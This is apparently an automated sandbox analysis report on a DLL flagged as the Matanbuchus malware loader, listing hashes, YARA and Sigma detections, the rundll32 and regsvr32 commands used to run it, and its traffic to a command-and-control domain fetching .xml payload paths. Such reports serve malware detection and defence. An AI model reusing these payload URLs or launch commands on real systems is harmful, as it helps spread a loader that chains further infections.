Edit tour

Windows Analysis Report
audiosrv.dll

Overview

General Information

Sample name:	audiosrv.dll
Analysis ID:	1544424
MD5:	d9b1327b71d0b2c51845b081ca3fe1c4
SHA1:	3ab1e90dd27462e6c5c1047048433ef4627bb672
SHA256:	c6f7c77c55a58bc37b2ea35baa35781bcead5dd48baf6c04e2f4a15fdedb14f4
Infos:

Detection

Matanbuchus

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

System process connects to network (likely due to code injection or exploit)

Yara detected Matanbuchus

Creates a process in suspended mode (likely to inject code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Yara signature match

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6160 cmdline: loaddll32.exe "C:\Users\user\Desktop\audiosrv.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6164 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 5424 cmdline: rundll32.exe "C:\Users\user\Desktop\audiosrv.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

regsvr32.exe (PID: 5400 cmdline: regsvr32.exe /i /s C:\Users\user\Desktop\audiosrv.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

rundll32.exe (PID: 6100 cmdline: rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllInstall MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 1240 cmdline: rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6504 cmdline: rundll32.exe C:\Users\user\Desktop\audiosrv.dll,DllUnregisterServer MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Matanbuchus	According to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.	No Attribution	https://blog.cyber5w.com/matanbuchus-loader-analysis https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/ https://isc.sans.edu/diary/rss/28752 https://medium.com/@DCSO_CyTec/a-deal-with-the-devil-analysis-of-a-recent-matanbuchus-sample-3ce991951d6a https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/	https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
audiosrv.dll	JoeSecurity_Matanbuchus	Yara detected Matanbuchus	Joe Security
audiosrv.dll	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x6bd0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
audiosrv.dll	Windows_Trojan_Matanbuchus_c7811ccc	unknown	unknown	0x6bd0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55 10 77 6C 72 08 8B 45 F8 3B 45 0C 73 62 6A 00 6A 08 8B 4D FC 51 8B 55 ...

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2427764945.0000000010001000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Matanbuchus_58a61aaa	unknown	unknown	0x67d0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
00000003.00000002.2427764945.0000000010001000.00000020.00000001.01000000.00000003.sdmp	Windows_Trojan_Matanbuchus_c7811ccc	unknown	unknown	0x67d0:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55 10 77 6C 72 08 8B 45 F8 3B 45 0C 73 62 6A 00 6A 08 8B 4D FC 51 8B 55 ...

Sigma Signatures

System Summary

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 76.223.105.230, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 5400, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49795

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T12:06:58.190491+0100	2803304	3	Unknown Traffic	192.168.2.5	49796	76.223.105.230	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: audiosrv.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: unknown	HTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 76.223.105.230:443 -> 192.168.2.5:49811 version: TLS 1.2

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 76.223.105.230 443

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cacheCookie: dps_site_id=us-east-2
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cacheCookie: dps_site_id=us-east-2
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cacheCookie: dps_site_id=us-east-2
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cacheCookie: dps_site_id=us-east-2

Source: Joe Sandbox View

IP Address: 76.223.105.230 76.223.105.230

Source: Joe Sandbox View

ASN Name: AMAZON-02US AMAZON-02US

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49796 -> 76.223.105.230:443

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cacheCookie: dps_site_id=us-east-2
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cacheCookie: dps_site_id=us-east-2
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cacheCookie: dps_site_id=us-east-2
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cacheCookie: dps_site_id=us-east-2

Source: global traffic

DNS traffic detected: DNS query: manageintel.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundLink: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossoriginCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-a9ecb8eX-Version: a9ecb8eX-SiteId: us-east-2Set-Cookie: dps_site_id=us-east-2; path=/; secureDate: Tue, 29 Oct 2024 11:06:57 GMTConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundLink: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossoriginCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-a9ecb8eX-Version: a9ecb8eX-SiteId: us-east-2Set-Cookie: dps_site_id=us-east-2; path=/; secureDate: Tue, 29 Oct 2024 11:06:58 GMTConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundLink: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossoriginCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-a9ecb8eX-Version: a9ecb8eX-SiteId: us-east-2Set-Cookie: dps_site_id=us-east-2; path=/; secureDate: Tue, 29 Oct 2024 11:06:59 GMTConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundLink: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossoriginCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-a9ecb8eX-Version: a9ecb8eX-SiteId: us-east-2Set-Cookie: dps_site_id=us-east-2; path=/; secureDate: Tue, 29 Oct 2024 11:07:01 GMTConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundLink: <//img1.wsimg.com/ceph-p3-01/website-builder-data-prod/static/widgets/UX.4.43.0.js>; rel=preload; as=script; crossorigin,<https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkids18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2>; rel=preload; as=font; crossorigin,<https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2>; rel=preload; as=font; crossorigin,<https://fonts.googleapis.com>; rel=preconnect; crossorigin,<https://fonts.gstatic.com>; rel=preconnect; crossorigin,<https://img1.wsimg.com>; rel=preconnect; crossorigin,<https://isteam.wsimg.com>; rel=preconnect; crossoriginCache-Control: max-age=30Content-Security-Policy: frame-ancestors 'self' godaddy.com *.godaddy.comContent-Type: text/html;charset=utf-8Vary: Accept-EncodingServer: DPS/2.0.0+sha-a9ecb8eX-Version: a9ecb8eX-SiteId: us-east-2Set-Cookie: dps_site_id=us-east-2; path=/; secureDate: Tue, 29 Oct 2024 11:07:02 GMTConnection: closeTransfer-Encoding: chunked

Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, audiosrv.dll	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: audiosrv.dll	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: audiosrv.dll	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: audiosrv.dll	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: audiosrv.dll	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: audiosrv.dll	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: audiosrv.dll	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, audiosrv.dll	String found in binary or memory: http://ocsp.comodoca.com0
Source: audiosrv.dll	String found in binary or memory: http://ocsp.sectigo.com0
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://scripts.sil.org/OFL
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/JulietaUla/Montserrat)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/clauseggers/Playfair-Display)
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com
